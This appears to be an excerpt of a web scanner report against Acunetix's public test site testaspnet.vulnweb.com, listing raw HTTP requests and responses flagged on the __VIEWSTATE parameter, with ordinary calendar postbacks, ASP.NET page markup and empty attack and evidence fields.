Request Body - size: 1,063 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8370&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAMBr%2FS7T2ghkZGQJ12EJOQw9wYSB4QZaGveA0%2BGAFw%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLy9LOxCwL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBKx43MBsjE7y1FiKQ6ozw90VPWFw
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:51:52 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAMBr/S7T2ghkZGQJ12EJOQw9wYSB4QZaGveA0+GAFw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLy9LOxCwL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBKx43MBsjE7y1FiKQ6ozw90VPWFw" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:White" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1073 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,073 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8378&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAMC5UHjZ2ghkZGSbqr%2BrHnM%2BusEF01uz54E%2BiUXG9w%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL%2Fu%2BmjDQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBCKwkzMjnj%2FgN%2BFjgUaxVlVV5aPY
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:13:04 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAMC5UHjZ2ghkZGSbqr+rHnM+usEF01uz54E+iUXG9w==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL/u+mjDQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBCKwkzMjnj/gN+FjgUaxVlVV5aPY" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:White" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1061 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
